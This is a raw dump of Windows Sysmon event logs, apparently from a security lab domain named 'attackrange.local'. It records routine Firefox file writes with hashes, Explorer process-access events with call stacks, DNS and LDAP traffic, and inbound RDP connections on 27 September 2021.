Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\jju9qh5l.default-release\datareporting\glean\db\data.safe.binMD5=2EAC749ADADA50CAB3A98420A496E16F,SHA256=8BF0057BAA96A67CC9D1B873A055FBD9F67911A4BF429D22D17CECDA010A275D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001051046Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:16:15.147{5EBD8912-7B3A-6151-3A78-00000000FC01}7120ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\jju9qh5l.default-release\datareporting\glean\db\data.safe.binMD5=B7FBDDB5E486A4A4DA6CC8BB6C70875C,SHA256=43377680DDEC39F575881E549F593459005CC98147AAB4CA64F94741A8D5D0AF,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001051045Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:16:15.147{5EBD8912-7B3A-6151-3A78-00000000FC01}7120ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\jju9qh5l.default-release\datareporting\glean\db\data.safe.binMD5=03CB23FD4A4DF94D603DE7BBAB56FB93,SHA256=7E7AB77797876672417320595FF895928728EF2E58129469B8749043E5E9024C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001051044Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:16:15.147{5EBD8912-7B3A-6151-3A78-00000000FC01}7120ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\jju9qh5l.default-release\datareporting\glean\db\data.safe.binMD5=D21D0C831AF11C709A1E02ACB6A7AA5F,SHA256=390171C06C19CFECF5CA5D148E9510E76F9628D1017D96F7F462764470110F8B,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001051043Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:16:15.147{5EBD8912-79C0-6151-E577-00000000FC01}42963900C:\Windows\Explorer.EXE{5EBD8912-7B3A-6151-3A78-00000000FC01}7120C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+61884|C:\Windows\System32\SHELL32.dll+62820|C:\Windows\System32\TwinUI.dll+f54e1|C:\Windows\System32\TwinUI.dll+f5d4f|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051042Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:16:15.147{5EBD8912-79C0-6151-E577-00000000FC01}42963900C:\Windows\Explorer.EXE{5EBD8912-7B3A-6151-3A78-00000000FC01}7120C:\Program Files\Mozilla Firefox\firefox.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\TwinUI.dll+f5319|C:\Windows\System32\TwinUI.dll+f5d4f|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x80000000000000001051041Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:16:15.147{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5513C57F912D22C20250C1D3EA47A5C1,SHA256=EE4C6F2BA7774A584553207E27E740FAF73658090B2979D21C43E0640719200A,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001051040Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:16:13.042{5EBD8912-7F30-614D-0F00-00000000FC01}288C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse87.236.208.230-51138-false10.0.1.14win-dc-429.attackrange.local3389ms-wbt-server 23542300x80000000000000001051054Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:16:16.148{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=13B6537149D378121D808B2821E8345F,SHA256=2763DF608E91109E4EBAE6FD55BA33FB8BC556FFFEAF3DF963C7C82DCC95A7EA,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000979703Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:16:16.127{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E52A4AC073BEC967B803482D9C5762D9,SHA256=9C8466352942B7BC1327A6C2A4EAD1D7051768503B1D04B02FEB9DD1FD3262BB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000979704Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:16:17.143{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=99A77317C357405143F1543494315278,SHA256=1693CC8216A293EE75B239702412E8ABC69BE136ECA7202A2568A3B109C3CDCC,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001051062Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:16:17.948{5EBD8912-7B3A-6151-3A78-00000000FC01}71204060C:\Program Files\Mozilla Firefox\firefox.exe{5EBD8912-7B3D-6151-3B78-00000000FC01}6180C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+37eb0|C:\Program Files\Mozilla Firefox\firefox.exe+37da6|C:\Program Files\Mozilla Firefox\firefox.exe+49380|C:\Program Files\Mozilla Firefox\firefox.exe+4907c|C:\Windows\SYSTEM32\ntdll.dll+7f60d|C:\Windows\SYSTEM32\ntdll.dll+3a7f0|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051061Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:16:17.948{5EBD8912-7B3A-6151-3A78-00000000FC01}71204060C:\Program Files\Mozilla Firefox\firefox.exe{5EBD8912-7B3D-6151-3B78-00000000FC01}6180C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+37eb0|C:\Program Files\Mozilla Firefox\firefox.exe+37da6|C:\Program Files\Mozilla Firefox\firefox.exe+49380|C:\Program Files\Mozilla Firefox\firefox.exe+4907c|C:\Windows\SYSTEM32\ntdll.dll+7f60d|C:\Windows\SYSTEM32\ntdll.dll+3a7f0|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x80000000000000001051060Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:16:17.402{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=ADF388A7F355FF9FD8FF2ED4A97CFB50,SHA256=1C597D9C546F6CE797F13888F23E4CF1B97CC0321EA7EA9A4844B5ACDC091C52,IMPHASH=00000000000000000000000000000000falsetrue 22542200x80000000000000001051059Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:16:15.181{5EBD8912-7B3A-6151-3A78-00000000FC01}7120prod.data-ingestion.prod.dataops.mozgcp.net035.244.247.133;C:\Program Files\Mozilla Firefox\firefox.exe 354300x80000000000000001051058Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:16:14.873{5EBD8912-7B3A-6151-3A78-00000000FC01}7120C:\Program Files\Mozilla Firefox\firefox.exeATTACKRANGE\Administratortcptruefalse10.0.1.14win-dc-429.attackrange.local53429-false35.244.247.133133.247.244.35.bc.googleusercontent.com443https 354300x80000000000000001051057Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:16:14.872{5EBD8912-7F40-614D-2F00-00000000FC01}2464C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-429.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-429.attackrange.local56484- 354300x80000000000000001051056Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:16:14.869{5EBD8912-7F40-614D-2F00-00000000FC01}2464C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-429.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-429.attackrange.local58854- 23542300x80000000000000001051055Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:16:17.148{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C31349D23F18A04F9B2C63A3789E6A1E,SHA256=50A4EB86B0002F13A0C1413DCEAF53A3B0B276CE08D04E8678540FD2BEF20D49,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000979705Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:16:18.159{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=CA4E04F3636615E4219E409ADD76E609,SHA256=8422B2416F7F4DC009548002BA4AD324AC75EFFF41A5BE0274F92870AC1797E0,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001051084Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:16:18.732{5EBD8912-7B3A-6151-3A78-00000000FC01}71204060C:\Program Files\Mozilla Firefox\firefox.exe{5EBD8912-7B3D-6151-3B78-00000000FC01}6180C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+37eb0|C:\Program Files\Mozilla Firefox\firefox.exe+37da6|C:\Program Files\Mozilla Firefox\firefox.exe+49380|C:\Program Files\Mozilla Firefox\firefox.exe+4907c|C:\Windows\SYSTEM32\ntdll.dll+7f60d|C:\Windows\SYSTEM32\ntdll.dll+3a7f0|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051083Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:16:18.716{5EBD8912-7B3A-6151-3A78-00000000FC01}71206336C:\Program Files\Mozilla Firefox\firefox.exe{5EBD8912-7B3D-6151-3B78-00000000FC01}6180C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1b5281|C:\Program Files\Mozilla Firefox\xul.dll+9e9474|C:\Program Files\Mozilla Firefox\xul.dll+a0d439|C:\Program Files\Mozilla Firefox\xul.dll+a0d35a|C:\Program Files\Mozilla Firefox\xul.dll+a0cf49|C:\Program Files\Mozilla Firefox\xul.dll+a090df|C:\Program Files\Mozilla Firefox\xul.dll+a093ec|C:\Program Files\Mozilla Firefox\xul.dll+b55c5a|C:\Program Files\Mozilla Firefox\xul.dll+2d9649|C:\Program Files\Mozilla Firefox\xul.dll+2d9554|C:\Program Files\Mozilla Firefox\xul.dll+2d933d|C:\Program Files\Mozilla Firefox\xul.dll+2d91d4|C:\Program Files\Mozilla Firefox\xul.dll+ba1993|C:\Program Files\Mozilla Firefox\xul.dll+ba2691|C:\Program Files\Mozilla Firefox\xul.dll+ba168d|C:\Program Files\Mozilla Firefox\xul.dll+ba15e2|C:\Program Files\Mozilla Firefox\xul.dll+b723b2|C:\Program Files\Mozilla Firefox\xul.dll+1a1b580|C:\Program Files\Mozilla Firefox\xul.dll+b78344|C:\Program Files\Mozilla Firefox\xul.dll+fca4c4|C:\Program Files\Mozilla Firefox\xul.dll+f36457|C:\Program Files\Mozilla Firefox\xul.dll+2cbfda 10341000x80000000000000001051082Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:16:18.701{5EBD8912-7B3A-6151-3A78-00000000FC01}71206336C:\Program Files\Mozilla Firefox\firefox.exe{5EBD8912-7B40-6151-3F78-00000000FC01}6828C:\Program Files\Mozilla Firefox\firefox.exe0x2200C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+2fb50|C:\Program Files\Mozilla Firefox\xul.dll+e4cd19|C:\Program Files\Mozilla Firefox\xul.dll+e4c869|C:\Program Files\Mozilla Firefox\xul.dll+e4dd0f|C:\Program Files\Mozilla Firefox\xul.dll+116feb6|C:\Program Files\Mozilla Firefox\xul.dll+e4959d|C:\Program Files\Mozilla Firefox\xul.dll+e31230|C:\Program Files\Mozilla Firefox\xul.dll+1eed842|C:\Program Files\Mozilla Firefox\xul.dll+19f1947|C:\Program Files\Mozilla Firefox\xul.dll+19f3b4d|C:\Program Files\Mozilla Firefox\xul.dll+177e8a9|C:\Program Files\Mozilla Firefox\xul.dll+1bb4c30|C:\Program Files\Mozilla Firefox\xul.dll+16c2490|C:\Program Files\Mozilla Firefox\xul.dll+1d25067|UNKNOWN(0000026DBAAE7C24) 10341000x80000000000000001051081Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:16:18.701{5EBD8912-79C0-6151-E577-00000000FC01}42966204C:\Windows\Explorer.EXE{5EBD8912-7B3A-6151-3A78-00000000FC01}7120C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+61884|C:\Windows\System32\SHELL32.dll+62df7|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+1544df|C:\Windows\System32\windows.storage.dll+15325f|C:\Windows\System32\windows.storage.dll+15620f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051080Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:16:18.701{5EBD8912-79C0-6151-E577-00000000FC01}42963900C:\Windows\Explorer.EXE{5EBD8912-7B3A-6151-3A78-00000000FC01}7120C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+61884|C:\Windows\System32\SHELL32.dll+62820|C:\Windows\System32\TwinUI.dll+f54e1|C:\Windows\System32\TwinUI.dll+f5d4f|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051079Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:16:18.701{5EBD8912-79C0-6151-E577-00000000FC01}42963900C:\Windows\Explorer.EXE{5EBD8912-7B3A-6151-3A78-00000000FC01}7120C:\Program Files\Mozilla Firefox\firefox.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\TwinUI.dll+f5319|C:\Windows\System32\TwinUI.dll+f5d4f|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 22542200x80000000000000001051078Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:16:15.183{5EBD8912-7B3A-6151-3A78-00000000FC01}7120prod.data-ingestion.prod.dataops.mozgcp.net9501-C:\Program Files\Mozilla Firefox\firefox.exe 354300x80000000000000001051077Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:16:16.093{5EBD8912-7F2D-614D-0B00-00000000FC01}624C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcpfalsetrue0:0:0:0:0:0:0:1win-dc-429.attackrange.local53430-true0:0:0:0:0:0:0:1win-dc-429.attackrange.local389ldap 354300x80000000000000001051076Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:16:16.093{5EBD8912-7F40-614D-2700-00000000FC01}2888C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exeNT AUTHORITY\SYSTEMtcptruetrue0:0:0:0:0:0:0:1win-dc-429.attackrange.local53430-true0:0:0:0:0:0:0:1win-dc-429.attackrange.local389ldap 354300x80000000000000001051075Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:16:16.037{5EBD8912-7F30-614D-0F00-00000000FC01}288C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse87.236.208.230-52917-false10.0.1.14win-dc-429.attackrange.local3389ms-wbt-server 354300x80000000000000001051074Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:16:15.994{5EBD8912-7F30-614D-0F00-00000000FC01}288C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse87.236.208.231-63575-false10.0.1.14win-dc-429.attackrange.local3389ms-wbt-server 23542300x80000000000000001051073Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:16:18.170{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7906AA1044CD23D54BE910CABC6E7C23,SHA256=BD7F3DE0B4E93B1EAA329B7D178950441E8C9DC01D1FA6D26D74840F9EC45640,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001051072Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:16:18.070{5EBD8912-79C0-6151-E577-00000000FC01}42966204C:\Windows\Explorer.EXE{5EBD8912-7AC5-6151-2378-00000000FC01}6244C:\Windows\regedit.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+6162f|C:\Windows\System32\SHELL32.dll+62f15|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+1544df|C:\Windows\System32\windows.storage.dll+15325f|C:\Windows\System32\windows.storage.dll+15620f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051071Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:16:18.070{5EBD8912-79C0-6151-E577-00000000FC01}42966204C:\Windows\Explorer.EXE{5EBD8912-7AC5-6151-2378-00000000FC01}6244C:\Windows\regedit.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+62e2e|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+1544df|C:\Windows\System32\windows.storage.dll+15325f|C:\Windows\System32\windows.storage.dll+15620f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051070Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:16:18.070{5EBD8912-79C0-6151-E577-00000000FC01}42966204C:\Windows\Explorer.EXE{5EBD8912-7AC5-6151-2378-00000000FC01}6244C:\Windows\regedit.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+61884|C:\Windows\System32\SHELL32.dll+62df7|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+1544df|C:\Windows\System32\windows.storage.dll+15325f|C:\Windows\System32\windows.storage.dll+15620f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051069Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:16:18.070{5EBD8912-7B3A-6151-3A78-00000000FC01}71206336C:\Program Files\Mozilla Firefox\firefox.exe{5EBD8912-7B40-6151-3F78-00000000FC01}6828C:\Program Files\Mozilla Firefox\firefox.exe0x2200C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+2fb50|C:\Program Files\Mozilla Firefox\xul.dll+e4cd19|C:\Program Files\Mozilla Firefox\xul.dll+e4c727|C:\Program Files\Mozilla Firefox\xul.dll+8b9000|C:\Program Files\Mozilla Firefox\xul.dll+8ad3ed|C:\Program Files\Mozilla Firefox\xul.dll+19a2e8e|C:\Program Files\Mozilla Firefox\xul.dll+166f362|C:\Program Files\Mozilla Firefox\xul.dll+19ccb3c|C:\Program Files\Mozilla Firefox\xul.dll+9ebb5f|C:\Program Files\Mozilla Firefox\xul.dll+26b8e|C:\Program Files\Mozilla Firefox\xul.dll+19d5d8|C:\Program Files\Mozilla Firefox\xul.dll+19c48f|C:\Program Files\Mozilla Firefox\xul.dll+42102ba|C:\Program Files\Mozilla Firefox\xul.dll+427c355|C:\Program Files\Mozilla Firefox\xul.dll+427d173|C:\Program Files\Mozilla Firefox\xul.dll+1ef1143|C:\Program Files\Mozilla Firefox\firefox.exe+5c4d|C:\Program Files\Mozilla Firefox\firefox.exe+1bb98|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051068Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:16:18.070{5EBD8912-79C0-6151-E577-00000000FC01}42963900C:\Windows\Explorer.EXE{5EBD8912-7AC5-6151-2378-00000000FC01}6244C:\Windows\regedit.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+6162f|C:\Windows\System32\SHELL32.dll+62890|C:\Windows\System32\TwinUI.dll+f54e1|C:\Windows\System32\TwinUI.dll+f5d4f|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051067Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:16:18.070{5EBD8912-79C0-6151-E577-00000000FC01}42963900C:\Windows\Explorer.EXE{5EBD8912-7AC5-6151-2378-00000000FC01}6244C:\Windows\regedit.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+47bc0|C:\Windows\System32\SHELL32.dll+6284c|C:\Windows\System32\TwinUI.dll+f54e1|C:\Windows\System32\TwinUI.dll+f5d4f|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051066Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:16:18.070{5EBD8912-79C0-6151-E577-00000000FC01}42963900C:\Windows\Explorer.EXE{5EBD8912-7AC5-6151-2378-00000000FC01}6244C:\Windows\regedit.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+61884|C:\Windows\System32\SHELL32.dll+62820|C:\Windows\System32\TwinUI.dll+f54e1|C:\Windows\System32\TwinUI.dll+f5d4f|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051065Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:16:18.070{5EBD8912-79C0-6151-E577-00000000FC01}42963900C:\Windows\Explorer.EXE{5EBD8912-7AC5-6151-2378-00000000FC01}6244C:\Windows\regedit.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\TwinUI.dll+f5319|C:\Windows\System32\TwinUI.dll+f5d4f|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051064Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:16:18.068{5EBD8912-7B3A-6151-3A78-00000000FC01}71204060C:\Program Files\Mozilla Firefox\firefox.exe{5EBD8912-7B3D-6151-3B78-00000000FC01}6180C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+37eb0|C:\Program Files\Mozilla Firefox\firefox.exe+37da6|C:\Program Files\Mozilla Firefox\firefox.exe+49380|C:\Program Files\Mozilla Firefox\firefox.exe+4907c|C:\Windows\SYSTEM32\ntdll.dll+7f60d|C:\Windows\SYSTEM32\ntdll.dll+3a7f0|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051063Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:16:18.067{5EBD8912-7B3A-6151-3A78-00000000FC01}71204060C:\Program Files\Mozilla Firefox\firefox.exe{5EBD8912-7B3D-6151-3B78-00000000FC01}6180C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+37eb0|C:\Program Files\Mozilla Firefox\firefox.exe+37da6|C:\Program Files\Mozilla Firefox\firefox.exe+49380|C:\Program Files\Mozilla Firefox\firefox.exe+4907c|C:\Windows\SYSTEM32\ntdll.dll+7f60d|C:\Windows\SYSTEM32\ntdll.dll+3a7f0|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x8000000000000000979706Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:16:19.174{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8CB3545BA212BAE131B0CA683C5317C0,SHA256=F6A7DB3D9B3C6784B1C53C4A96980104C3EB8FA1890BD8066D825B4DF525DBE4,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001051087Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 